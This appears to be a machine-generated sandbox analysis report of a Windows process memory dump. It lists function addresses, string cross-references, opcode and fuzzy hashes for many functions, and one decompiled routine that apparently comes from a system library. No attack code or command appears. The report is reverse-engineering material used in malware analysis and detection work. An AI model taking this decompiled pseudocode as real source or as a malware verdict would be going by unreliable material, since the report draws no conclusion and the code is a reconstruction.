0x00acf0f4
0x00acf0f8
0x00acf100
0x00acf108
0x00acf10d
0x00acf115
0x00acf116
0x00acf11f
0x00acf123
0x00acf124
0x00acf12c
0x00acf130
0x00acf134
0x00acf13d
0x00acf144
0x00acf14b
0x00acf152
0x00b0bab0
0x00b0bab0
0x00acf158
0x00acf158
0x00acf15a
0x00acf160
0x00acf165
0x00acf166
0x00acf16f
0x00acf173
0x00b0baa7
0x00b0baa7
0x00b0baab
0x00000000
0x00acf179
0x00acf18d
0x00acf191
0x00b0baa2
0x00000000
0x00acf197
0x00acf19b
0x00acf1a2
0x00acf1a9
0x00acf1af
0x00acf1b2
0x00acf1b6
0x00acf1b9
0x00acf1c4
0x00acf1d8
0x00acf1df
0x00acf1e3
0x00acf1eb
0x00acf1ee
0x00acf1f4
0x00acf20f
0x00b0bab7
0x00b0babb
0x00b0bacc
0x00b0bad1
0x00acf215
0x00acf218
0x00acf226
0x00acf22b
0x00000000
0x00acf22b
0x00acf1f6
0x00acf1f6
0x00acf1f9
0x00acf1fb
0x00acf1fb
0x00acf1f4
0x00acf191
0x00acf173
0x00acf152
0x00acf203

Strings

@, xrefs: 00ACF124

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: d088eb3795562120c3d54dae9e4beaf090d35be107e2f3002b2ff38905216862
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 4E515871604710AFC321DF19C841E6BBBF9BF88710F108A2EF99687691E7B4E944CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B13540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00B13540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xb8d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00AD0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					L00B13706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00ADFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00B13540;
						E00ADFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00AEDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00B20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						L00AD97C0();
					}
					return L00ADB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00B13971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00B13884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00ADFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = L00AD9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							L00B13787(_a4,  &_v352, _t80);
						}
					}
					L00AB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00AD95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00b13552
0x00b1355a
0x00b1355d
0x00b13566
0x00b13567
0x00b1357e
0x00b1358f
0x00b135a1
0x00b135a5
0x00b1366b
0x00b1366b
0x00b1366d
0x00b13672
0x00b13679
0x00b13685
0x00b1368d
0x00b1369d
0x00b136a7
0x00b136b8
0x00b136c6
0x00b136c7
0x00b136dc
0x00b136e1
0x00b136e7
0x00b136e9
0x00b136e9
0x00b13703
0x00b13703
0x00b135b5
0x00b135c0
0x00b135c4
0x00000000
0x00000000
0x00b135ca
0x00b135d7
0x00b135e2
0x00b135e6
0x00b135e8
0x00b135f5
0x00b135fa
0x00b13603
0x00b13604
0x00b13609
0x00b1360a
0x00b13612
0x00b13613
0x00b1361e
0x00b13622
0x00b13628
0x00b1362f
0x00b1362f
0x00b13636
0x00b13638
0x00b1363b
0x00b13642
0x00b13642
0x00b13636
0x00b13657
0x00b13657
0x00b1365c
0x00b13662
0x00b13669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 00B1358F

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 8fd8c2b03b73fa8458af19e3e66d1d9feabe5d30ae8992798e10984242e5eb12
Instruction ID: 2b293d70628d646d8f4d0239600cd3d5ac3d3c5c456bd849b8cecf5e4ea894e7
Opcode Fuzzy Hash: 8fd8c2b03b73fa8458af19e3e66d1d9feabe5d30ae8992798e10984242e5eb12
Instruction Fuzzy Hash: 7D4143F1D0452CAADF21DA50DD81FDEB7BCAB44B14F4045E5EA09AB241EB309F888F94

Uniqueness

Uniqueness Score: -1.00%

Function 00B605AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

`, xrefs: 00B60633

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 7bf49f8c2bcae282472c6b07c45f8a5d8b51cff9e323bef65292928ffc971912
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 813122322003056BE720EE26CD85F9B77D9EBC4754F0482A9FA58AB2C0D774ED14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B13884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 00B138B4

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 7c557efb3140dbf5451cc79dabdee2760df79692b36c2928d408d5e530df2e2b
Instruction ID: 2b48cc7bc7f75fa56d4301af775b02485f969c4de6ccde620c960ef9e4089905
Opcode Fuzzy Hash: 7c557efb3140dbf5451cc79dabdee2760df79692b36c2928d408d5e530df2e2b
Instruction Fuzzy Hash: B731F472900519AFDB15DB58C945DABB7F4EB80B60F1181A9B806A7241E770DF80C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00ACD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 00ACD303

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8ce62aa8ffaf4e6c9bce52290252ecab10a7db51246a6379781c4498778c0294
Instruction ID: 3c3ffb75a255edceebfdc2a073481dedcf988ef2120f9d090965333fb96bf51a
Opcode Fuzzy Hash: 8ce62aa8ffaf4e6c9bce52290252ecab10a7db51246a6379781c4498778c0294
Instruction Fuzzy Hash: 4B3198B55083819FC311DF28C981EABBBE8EB89754F01092EB89597311EB34DD04DB93

Uniqueness

Uniqueness Score: -1.00%

Function 00AA1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 00AA1BC5

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 751ab085b59a690e6c717451c0cd5bb272c5ccea68b4d45f5bf87398b9768a23
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 9121C577541228BBCB219F99C940FAFB7BDAF56B60F154426F9059B240DB34DD0097A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B48DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

Critical error detected %lx, xrefs: 00B48E21

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: da3ae473951d429b2e534ea00dd89ad15f47be10c7a459b878a9dd08639be837
Instruction ID: abf6c0ea8aa024a64aba8df927202cb2358a207ec5031c01e7e95d103f4ca0cc
Opcode Fuzzy Hash: da3ae473951d429b2e534ea00dd89ad15f47be10c7a459b878a9dd08639be837
Instruction Fuzzy Hash: 42115B71D54348EADF24DFA585067ACBBF0FB04714F24429EE429AB292C7744A01DF14

Uniqueness

Uniqueness Score: -1.00%

Function 00B65BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da4f0b7c17a8279333ceadef92737ab48c8afd088a1fe3e3a5f98cbced8bee0
Instruction ID: 13232c11880ca82ee16dc661757b0568d61ad5af0c31add03bb6f826a9f0d4e1
Opcode Fuzzy Hash: 9da4f0b7c17a8279333ceadef92737ab48c8afd088a1fe3e3a5f98cbced8bee0
Instruction Fuzzy Hash: 124247759006298FDB24CF68C881BA9B7F1FF49304F1481EAD94DAB342E7399A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00AB4120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2b3f8e2efd24a0ee4ab0f922266c7c358dbdf025e815d42179cc72608f94cb4
Instruction ID: 5d284dce7cfa0702558d9403be1c4d1e6c8bae0d6a4fab5ffa7ecbaa91353566
Opcode Fuzzy Hash: f2b3f8e2efd24a0ee4ab0f922266c7c358dbdf025e815d42179cc72608f94cb4
Instruction Fuzzy Hash: 85F15B706082518FC724CF59C480ABAB7F5BF98714F144A2EF586CB2A2E734DC95DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00AC20A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d80b905fc9de15ff771a9133ae1b811e1e99482ef4e5c3c52695f90a01cca970
Instruction ID: dd13af200cadc210a14bfdd496d4386e426391c770bcd84d91f7cfa3015621cc
Opcode Fuzzy Hash: d80b905fc9de15ff771a9133ae1b811e1e99482ef4e5c3c52695f90a01cca970
Instruction Fuzzy Hash: 93F10031A087419FDB35CB28C840B6B7BE5EF95324F1A866DE8999B390D734DC40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00AA849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f1240401d3126829e02b12fbe80cb0d93e3bcb6e20d12468b22030cb7ed17a5
Instruction ID: 5049abbb0641ea88613cd92f07a46a781e516f66e8d8ef4cc64ca97063a7a8f9
Opcode Fuzzy Hash: 4f1240401d3126829e02b12fbe80cb0d93e3bcb6e20d12468b22030cb7ed17a5
Instruction Fuzzy Hash: FBB15D70E04249DFDB14DFD9C984AAEBBB9FF49304F20412AE505AB396DB74AD41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AC513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5185f61507fe4baf0e8b443139626b7797727fe59bbe1748e07a9dd809f9088e
Instruction ID: c8dd42b277ce6473c77c6869621b3cbd552901e4868bfc3fdf94ec954c97f59f
Opcode Fuzzy Hash: 5185f61507fe4baf0e8b443139626b7797727fe59bbe1748e07a9dd809f9088e
Instruction Fuzzy Hash: CBC1F1755097818FD354CF28C580A5AFBF1BF88304F184AAEF8998B392D771E985CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00AC03E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c861fcdae5183e200d9846617352da8158e24fcdb24042d1371b32fae0ae2a
Instruction ID: 97dfb72a0f0b218ceb040acb750b7843920804a62b0add211936ecfe22a1a7e5
Opcode Fuzzy Hash: e5c861fcdae5183e200d9846617352da8158e24fcdb24042d1371b32fae0ae2a
Instruction Fuzzy Hash: C0914971E00218EFEB359B68CD45FAE7BE4EB01714F1642A9FA11A72E1DB749D40CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B8D0, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b53bf61db807f99b6f1e0da92b68af289149a7123ea337a0590a9a2311bfa97
Instruction ID: 7ca7390788008234d1271ca193a729c89774d6421c4f5bda93d78a52d186259b
Opcode Fuzzy Hash: 6b53bf61db807f99b6f1e0da92b68af289149a7123ea337a0590a9a2311bfa97
Instruction Fuzzy Hash: 47711032200B11AFDB31CF24E985F66B7E5EF44720F244968E65A8B2A1DF71E980CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B16DC9, Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 8e0fd55c1a56ce47a8555c21f7b5e2a6b1bb2be8092a8b5ed9621e2bdf6972d9
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 98716C71A00219AFCB10DFA5C985AEEBBF9FF48710F1045A9E505E7252DB34EA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2AE4, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bedd8a67270fce4f4fce97063326da6f0d03e176dbeb629c132a402e023e546d
Instruction ID: 7e5f705797d0c28fa84e7486f3d56472f04693bb730c7dbba5d8187635aeec3e
Opcode Fuzzy Hash: bedd8a67270fce4f4fce97063326da6f0d03e176dbeb629c132a402e023e546d
Instruction Fuzzy Hash: C8519F7AB001158FCB18DF1DC890BBDB7B1FB88700716856EE856AB364DB30AE51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ABDBE9, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c777b8bc466d3c4ae098bd8859f9816deec4d66a00a8d4033ac155eac838c9
Instruction ID: c4e7522f4a371c9c53a2560dc56971b9603559d61530b86912b46a314e031560
Opcode Fuzzy Hash: 74c777b8bc466d3c4ae098bd8859f9816deec4d66a00a8d4033ac155eac838c9
Instruction Fuzzy Hash: 6B519E71A01605DFCB14CFA8C590AEEBBF9BF49310F20855AD595AB342EB71AD44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B6740D, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: 397be53597850578adf0af060a8f3c2e38324c6fc83e5a41df663214f9bd31b5
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: CA51AA71640606EFDB15CF14C580A96BBF5FF55308F1481FAE8099F222EB71E946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2990, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9071f2ee8a0c7251ccbe51f321803d35f598142a9af94a3e4440d5485a7c5f60
Instruction ID: 4177cd73c9e86915dedd70bb9320f6477f141114188f74f815c539c466382e8c
Opcode Fuzzy Hash: 9071f2ee8a0c7251ccbe51f321803d35f598142a9af94a3e4440d5485a7c5f60
Instruction Fuzzy Hash: 8E514371A00209AFDF25DF59C980FDEBBB1FB48350F168059E815AB260C3719D52DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4D3B, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f74b004c182a1ee3f822987650ff410d511bbcbeca0761436110516933932f91
Instruction ID: 9cfccd9830a4376a5b58d56f3ffadeb5a9b2d9019f22c9a6602aba4c427d4beb
Opcode Fuzzy Hash: f74b004c182a1ee3f822987650ff410d511bbcbeca0761436110516933932f91
Instruction Fuzzy Hash: EC41B271A40318AFEB31DF14CD91FAABBA9FB48710F06409EE8469B291DB74DD40CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4BAD, Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d480ebce8449740772204baf49c1fe49493b358f213b72e4cfc210eed02b2660
Instruction ID: ddde2d51ce5ebde77b829bf6181f3c6246f832dd3b7c8d4ecaed1940c7676650
Opcode Fuzzy Hash: d480ebce8449740772204baf49c1fe49493b358f213b72e4cfc210eed02b2660
Instruction Fuzzy Hash: 0841B335A052289FCB21DF68C941FEE77F8EF49710F0100A9E909AB291DB74DE84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00AA8A0A, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f72c007e3bb15d02d6281de395a7cfcd429ac3fe6bec6f31f41865ed1ae77d3
Instruction ID: 3d462fb77698585d141848501045d93da4178fc69a000f49d4ceabcec96a7163
Opcode Fuzzy Hash: 9f72c007e3bb15d02d6281de395a7cfcd429ac3fe6bec6f31f41865ed1ae77d3
Instruction Fuzzy Hash: B34174B1A0132C9BDB24DF55CC88BA9B7F4FB55340F1145EAE81997292EB749E80CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AA16, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 245c2483a777895eb4426b638085e029cb7a65e5d508fb1a7e2e13faa59bdf1f
Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction Fuzzy Hash: 3231E232B001446BDB169B69C885BAFFBEAEF84312F1581E9EC05B7252DA749D08C691

Uniqueness

Uniqueness Score: -1.00%

Function 00B5FDE2, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: 306ae305d39996231bab56c48d30bff32870f1567b8622df6b56bb43ddec7a8d
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: 213105322006416FD722A768C886F7AFBEAEBC5341F1844E8FC468B752DA74DC45C720

Uniqueness

Uniqueness Score: -1.00%

Function 00B5EA55, Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction ID: 5c6bff344c0561a8187ed3426eca647dc28ff18f9235af2d640ef846716a2521
Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
Instruction Fuzzy Hash: 783190726047059FC719DF24C981A6BB7EAFBC0351F0489ADF96687641DB30E909CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B169A6, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ff259a9e5eaa0f701193fced7c205125078cec94a60752e4990a78f06f7253
Instruction ID: 75e6b58585c4307d76dd9b9ff4610e35e16cb034b84fe3312c440ae4b0a08e2c
Opcode Fuzzy Hash: 21ff259a9e5eaa0f701193fced7c205125078cec94a60752e4990a78f06f7253
Instruction Fuzzy Hash: D241BEB1D00208AFDB24DFA4D941BFEBBF8FF48714F14816AE814A72A1EB709945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A95210, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e48601523b5bcfa07229b4d4f8350f09eaed12b9a26be918928bb21c37cd63a7
Instruction ID: 6483142b3c92b2880432813dd8b54bd654cd32c0361c42b699f08f3c9ebedb32
Opcode Fuzzy Hash: e48601523b5bcfa07229b4d4f8350f09eaed12b9a26be918928bb21c37cd63a7
Instruction Fuzzy Hash: 7D310831741A04EBCB26ABA8C952FB677B5FF50760F21462AF5164B1E2DB70EC00C790

Uniqueness

Uniqueness Score: -1.00%

Function 00AD3D43, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd29b56bdf12a3ad40a26b543faaf431f438bb002081ab30091ace4cbecc2f3b
Instruction ID: 82aa72296943842a9dac9393cbea3a43764f9e0e7e5ad14d72f49d8a9118703f
Opcode Fuzzy Hash: cd29b56bdf12a3ad40a26b543faaf431f438bb002081ab30091ace4cbecc2f3b
Instruction Fuzzy Hash: DE31A472605615DBCB258F29C841A7BBBF5EF55700B1588AFE486CB390EB30DD40DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B17016, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ba059e6d274181da5227086bf9880cebb01ca6d036b7636008f21c045a3d60a
Instruction ID: 5c7e9c3b2b9c4790c4302048902705e76d36c4d4e016a8e74477aea434cdb56b
Opcode Fuzzy Hash: 3ba059e6d274181da5227086bf9880cebb01ca6d036b7636008f21c045a3d60a
Instruction Fuzzy Hash: A731B372608751ABC320DF28C941AABB3F9FFC8700F444A69F89597791EB30E954C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00ABC182, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 102dfc33539b135fa4c06800ffee8f42543a2b772af2d93f6337beb9f385a4cd
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: FB310871601546BED708EBB4C581BE9FBA8BF42314F14826AE41C57243DB355D49D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AC61A0, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6c60806d7d989cf3841bf9225892582e15f2aa5041e74a7c31481c711f2e8a9
Instruction ID: 412137109669f8a7d3eeca3cd2190e04f34c118f2027d1bac64be0e81b0789e9
Opcode Fuzzy Hash: b6c60806d7d989cf3841bf9225892582e15f2aa5041e74a7c31481c711f2e8a9
Instruction Fuzzy Hash: 9F316B71A097019FD320CF19C940B26FBE5FB88B00F1949ADE99997391EB71EC44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A9AA16, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae267ed35ca56b4cc39aaa16ebc90897b7af3cf091f2f1daab6f04a83736c0ac
Instruction ID: 689cb9384c3377224cd22d0f11a88bb73402f8f1a9a35d1f59268ace2344fd0d
Opcode Fuzzy Hash: ae267ed35ca56b4cc39aaa16ebc90897b7af3cf091f2f1daab6f04a83736c0ac
Instruction Fuzzy Hash: 4731C371A00619ABCF109FA4CE42ABFB7B9FF08700F11446AF905EB251EB749D51DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD8EC7, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d3bf45b4ee693533311d9f2175e87c9fb9854257f023418f1d2345f1192d23b
Instruction ID: 371d55e5eade53911dd5d3f66377bda77e73c9c6a24e8ea5ebf6c5d1700a2f3a
Opcode Fuzzy Hash: 4d3bf45b4ee693533311d9f2175e87c9fb9854257f023418f1d2345f1192d23b
Instruction Fuzzy Hash: F34192B1D003189EDB20CFAAD981AADFBF4FB48710F5081AEE509A7650EB745A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00AD4A2C, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, Offset: 00A70000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a4b3382a71973f4d4169f88adcb2a7d5025f53b37bbd94b83bd8f180699e010
Instruction ID: 49fc5f05147f5236b7165849d0a101aaafcb20513517fae9c1986f38e61286b2
Opcode Fuzzy Hash: 9a4b3382a71973f4d4169f88adcb2a7d5025f53b37bbd94b83bd8f180699e010
Instruction Fuzzy Hash: 9B312F322452409FC731AF54CA81B6ABBE4FF89B40F50446AF8524B3A1DB70DC00CB85

Uniqueness

Uniqueness Score: -1.00%

